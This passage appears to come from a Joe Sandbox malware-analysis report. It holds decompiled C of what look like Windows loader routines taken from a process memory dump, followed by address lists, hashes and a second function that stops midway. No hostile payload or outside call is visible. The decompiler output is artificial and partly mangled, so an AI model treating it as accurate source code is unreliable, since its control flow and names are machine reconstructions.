												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x31d3f88
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x31d1f78
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x31d3f88
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x31d5138
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E037DFFB0(_t287, _t353, 0x38b84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0381CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E037D6600(0x38b52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E037D7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x38bb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0384E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x38b8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x38bb218; // 0x0
														asm("ror edi, cl");
														 *0x38bb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E037E2280(_t250, 0x38b84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03803898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E037DFFB0(_t293, _t353, 0x38b84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E038037F5(_t353, 0);
																}
																E03800413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E037F9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E037F02D6(_t174);
																}
																L037E77F0( *0x38b7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E037FC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L037DEC7F(_t353);
										L037F19B8(_t287, 0, _t353, 0);
										_t200 = E037CF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0380B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x38bb2f8; // 0xcc0000
									if((_t206 |  *0x38bb2fc) == 0 || ( *0x38bb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x38bb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E03876B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E03876AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E037DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L037DEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03809730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E037DE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L037D8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03803C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x037dd5f2
0x037dd5f5
0x037dd5f5
0x037dd5fd
0x037dd600
0x037dd60a
0x037dd60d
0x037dd617
0x037dd61d
0x037dd627
0x037dd62e
0x037dd911
0x037dd913
0x00000000
0x037dd919
0x037dd919
0x037dd919
0x037dd634
0x037dd634
0x037dd634
0x037dd634
0x037dd640
0x037dd8bf
0x00000000
0x037dd646
0x037dd646
0x037dd64d
0x037dd652
0x0382b2fc
0x0382b2fc
0x0382b302
0x0382b33b
0x0382b341
0x00000000
0x0382b304
0x0382b304
0x0382b319
0x0382b31e
0x0382b324
0x0382b326
0x0382b332
0x0382b347
0x0382b34c
0x0382b351
0x0382b35a
0x00000000
0x0382b328
0x0382b328
0x00000000
0x0382b328
0x0382b326
0x037dd658
0x037dd658
0x037dd65b
0x037dd665
0x00000000
0x037dd66b
0x037dd66b
0x037dd66b
0x037dd66b
0x037dd66d
0x037dd672
0x037dd67a
0x00000000
0x00000000
0x037dd680
0x037dd686
0x037dd8ce
0x037dd8d4
0x037dd8da
0x037dd8dd
0x037dd8dd
0x037dd8e0
0x037dd68c
0x037dd691
0x037dd69d
0x037dd6a2
0x037dd6a7
0x037dd6b0
0x037dd6b0
0x037dd6b5
0x037dd6e0
0x037dd6b7
0x037dd6b7
0x037dd6b9
0x037dd6b9
0x037dd6bb
0x037dd6bd
0x037dd6ce
0x037dd6d0
0x037dd6d2
0x0382b363
0x0382b365
0x00000000
0x0382b36b
0x00000000
0x0382b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x037dd6bf
0x037dd6bf
0x037dd6e5
0x037dd6e7
0x037dd6e9
0x037dd6e9
0x037dd6ec
0x037dd6ec
0x037dd6ef
0x037dd6f5
0x037dd6f9
0x037dd6fb
0x037dd6fd
0x037dd701
0x037dd703
0x037dd70a
0x037dd70a
0x037dd70a
0x037dd701
0x037dd70d
0x037dd710
0x037dd710
0x037dd6c1
0x037dd6c1
0x037dd6c1
0x037dd6c6
0x0382b36d
0x0382b36f
0x00000000
0x0382b375
0x0382b375
0x0382b375
0x00000000
0x0382b375
0x00000000
0x037dd6cc
0x037dd6d8
0x037dd6d8
0x037dd6d8
0x00000000
0x037dd6c6
0x037dd6bf
0x00000000
0x037dd6da
0x037dd6da
0x037dd716
0x037dd71b
0x037dd720
0x037dd726
0x037dd726
0x037dd72d
0x00000000
0x037dd733
0x037dd739
0x037dd742
0x037dd750
0x037dd758
0x037dd764
0x037dd776
0x037dd77a
0x037dd783
0x037dd928
0x037dd92c
0x037dd93d
0x037dd944
0x037dd94f
0x037dd954
0x037dd956
0x037dd95f
0x037dd961
0x037dd973
0x037dd973
0x037dd956
0x037dd944
0x037dd92c
0x037dd78b
0x0382b394
0x037dd791
0x037dd798
0x0382b3a3
0x0382b3bb
0x0382b3bb
0x037dd7a5
0x037dd866
0x037dd870
0x037dd884
0x037dd892
0x037dd898
0x037dd89e
0x037dd8a0
0x037dd8a6
0x037dd8ac
0x037dd8ae
0x037dd8b4
0x037dd8b4
0x037dd8ae
0x037dd7a5
0x037dd78b
0x037dd7b1
0x0382b3c5
0x0382b3c5
0x037dd7c3
0x037dd7ca
0x037dd7e5
0x037dd7eb
0x037dd8eb
0x037dd8ed
0x00000000
0x037dd8f3
0x037dd8f3
0x037dd8f3
0x00000000
0x037dd8ed
0x037dd7cc
0x037dd7cc
0x037dd7d2
0x00000000
0x037dd7d4
0x037dd7d4
0x037dd7d7
0x037dd7df
0x0382b3d4
0x0382b3d9
0x0382b3dc
0x0382b3dc
0x0382b3df
0x0382b3e2
0x0382b468
0x0382b46d
0x0382b46f
0x0382b46f
0x0382b475
0x037dd8f8
0x037dd8f9
0x037dd8fd
0x0382b3e8
0x0382b3e8
0x0382b3eb
0x0382b3ed
0x00000000
0x0382b3ef
0x0382b3ef
0x0382b3f1
0x0382b3f4
0x0382b3fe
0x0382b404
0x0382b409
0x0382b40e
0x0382b410
0x0382b410
0x0382b414
0x0382b414
0x0382b41b
0x0382b420
0x0382b423
0x0382b425
0x0382b427
0x0382b42a
0x0382b42d
0x0382b42d
0x0382b42a
0x0382b432
0x0382b436
0x0382b438
0x0382b43b
0x0382b43b
0x0382b449
0x0382b44e
0x0382b454
0x0382b458
0x0382b458
0x0382b45d
0x00000000
0x0382b45d
0x0382b3ed
0x00000000
0x00000000
0x00000000
0x037dd7df
0x037dd7d2
0x037dd7ca
0x0382b37c
0x0382b37e
0x0382b385
0x0382b38a
0x00000000
0x0382b38a
0x037dd742
0x037dd7f1
0x037dd7f8
0x0382b49b
0x0382b49b
0x037dd800
0x037dd837
0x037dd843
0x037dd845
0x037dd847
0x037dd84a
0x037dd84b
0x037dd84e
0x037dd857
0x037dd802
0x037dd802
0x037dd80d
0x00000000
0x037dd818
0x037dd818
0x037dd824
0x037dd831
0x0382b4a5
0x0382b4ab
0x0382b4b3
0x0382b4b8
0x0382b4bb
0x00000000
0x0382b4c1
0x0382b4c1
0x0382b4c8
0x00000000
0x0382b4ce
0x0382b4d4
0x0382b4e1
0x0382b4e3
0x0382b4e5
0x00000000
0x0382b4eb
0x0382b4f0
0x0382b4f2
0x037ddac9
0x037ddacc
0x037ddacf
0x037ddad1
0x037ddd78
0x037ddd78
0x037ddcf2
0x00000000
0x037ddad7
0x037ddad9
0x037ddadb
0x00000000
0x00000000
0x037ddae1
0x037ddae1
0x037ddae4
0x037ddae6
0x0382b4f9
0x0382b4f9
0x0382b500
0x037ddaec
0x037ddaec
0x037ddaf5
0x037ddaf8
0x037ddafb
0x037ddb03
0x037ddb11
0x037ddb16
0x037ddb19
0x037ddb1b
0x0382b52c
0x0382b531
0x0382b534
0x037ddb21
0x037ddb21
0x037ddb24
0x037ddcd9
0x037ddce2
0x037ddce5
0x037ddd6a
0x037ddd6d
0x00000000
0x037ddd73
0x0382b51a
0x0382b51c
0x0382b51f
0x0382b524
0x00000000
0x0382b524
0x037ddce7
0x037ddce7
0x037ddce7
0x00000000
0x037ddce7
0x00000000
0x037ddb2a
0x037ddb2c
0x037ddb31
0x037ddb33
0x037ddb36
0x037ddb39
0x037ddb3b
0x037ddb66
0x037ddb66
0x037ddb3d
0x037ddb3d
0x037ddb3e
0x037ddb46
0x037ddb47
0x037ddb49
0x037ddb4c
0x037ddb53
0x037ddb55
0x037ddb58
0x037ddb5a
0x0382b50a
0x0382b50f
0x0382b512
0x037ddb60
0x037ddb60
0x037ddb63
0x037ddb63
0x00000000
0x037ddb63
0x037ddb5a
0x037ddb3b
0x037ddb24
0x037ddb69
0x037ddb69
0x037ddb6c
0x037ddb6f
0x037ddb74
0x0382b557
0x0382b557
0x0382b55e
0x037ddb7a
0x037ddb7c
0x037ddb7f
0x037ddb82
0x037ddb85
0x00000000
0x037ddb8b
0x037ddb8b
0x037ddb8d
0x037ddb9b
0x037ddb9b
0x037ddb9d
0x037ddba0
0x037ddba2
0x037ddba4
0x037ddba7
0x037ddba9
0x037ddbae
0x037ddbae
0x037ddbb1
0x037ddbb4
0x037ddbb4
0x037ddbb7
0x037ddbba
0x037ddcd2
0x037ddcd4
0x00000000
0x037ddbc0
0x037ddbc0
0x037ddbd2
0x037ddbd7
0x037ddbda
0x037ddbdd
0x037ddbdf
0x00000000
0x037ddbe5
0x037ddbe5
0x037ddbee
0x037ddbf1
0x0382b541
0x0382b544
0x00000000
0x0382b546
0x0382b546
0x00000000
0x0382b546
0x037ddbf7
0x037ddbf7
0x037ddbfd
0x037ddbfd
0x037ddbff
0x037ddc0b
0x037ddc15
0x037ddc1b
0x037ddc1d
0x037ddc21
0x037ddc21
0x037ddc23
0x037ddc23
0x037ddc26
0x037ddc29
0x037ddc2b
0x00000000
0x00000000
0x037ddc31
0x037ddc34
0x037ddc36
0x037ddcbf
0x037ddcbf
0x037ddcc2
0x00000000
0x037ddc3c
0x037ddc41
0x037ddc43
0x00000000
0x037ddc45
0x037ddc45
0x037ddc47
0x00000000
0x037ddc4d
0x037ddc4d
0x037ddc50
0x037ddc52
0x037ddc55
0x037ddcfa
0x037ddcfe
0x037ddd08
0x037ddd0a
0x037ddd0c
0x00000000
0x037ddd12
0x037ddd15
0x037ddd2d
0x037ddd2f
0x037ddd32
0x037ddd35
0x00000000
0x037ddd35
0x037ddc5b
0x037ddc5b
0x037ddc5e
0x037ddc61
0x037ddc64
0x037ddc67
0x037ddc67
0x037ddc6a
0x037ddc6c
0x037ddc8e
0x037ddc8e
0x037ddc91
0x037ddc93
0x037ddcce
0x037ddcce
0x037ddc95
0x037ddc9c
0x037ddc6e
0x037ddc72
0x037ddc75
0x037ddc77
0x037ddc79
0x0382b551
0x0382b551
0x00000000
0x037ddc7f
0x037ddc7f
0x037ddc81
0x00000000
0x037ddc83
0x037ddc86
0x037ddc88
0x00000000
0x00000000
0x00000000
0x00000000
0x037ddc88
0x037ddc81
0x037ddc79
0x037ddc6c
0x037ddc55
0x037ddc47
0x037ddc43
0x00000000
0x037ddc36
0x037ddc23
0x00000000
0x037ddbff
0x037ddbf1
0x037ddbdf
0x037ddb8f
0x037ddb92
0x037ddb95
0x00000000
0x00000000
0x00000000
0x00000000
0x037ddb95
0x037ddb8d
0x037ddb85
0x037ddb74
0x037ddc9f
0x037ddca2
0x037ddcb0
0x037ddcb0
0x037ddad1
0x0382b4e5
0x0382b4c8
0x00000000
0x00000000
0x00000000
0x037dd831
0x037dd80d
0x00000000
0x037dd800
0x0382b47f
0x0382b485
0x00000000
0x0382b485
0x037dd665
0x037dd652
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 478286bf1e3d5af942d16dcd1a867e4a163f55a1b329093d8d3724119d137c0c
Instruction ID: e26e9a4dc0c12199609a05e8b11d38e5be45745d5d261e7e18cfd4a68d557658
Opcode Fuzzy Hash: 478286bf1e3d5af942d16dcd1a867e4a163f55a1b329093d8d3724119d137c0c
Instruction Fuzzy Hash: C6E1F434A0175ACFDB35DF68C884BA9BBB6BF85314F0801E9D9099B290D774AD81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 037D849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E037D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x389f9c0);
				E0381D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x38b7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E037DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E037E2280( *[fs:0x30], 0x38b8550);
						_t139 =  *0x38b7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E037FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E037DFFB0(_t193, _t235, 0x38b8550);
								L5:
								return E0381D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E037C1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x38b7b9c; // 0x0
							_t235 = L037E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x38b7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E037FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E037DFFB0(_t193, _t235, 0x38b8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L037E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L037E77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x38b7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x38b7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E038037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x38b7b9c; // 0x0
									_t214 = L037E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E038037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x38b7b10 =  *0x38b7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x38b7b04 =  *0x38b7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L037E77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L037E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
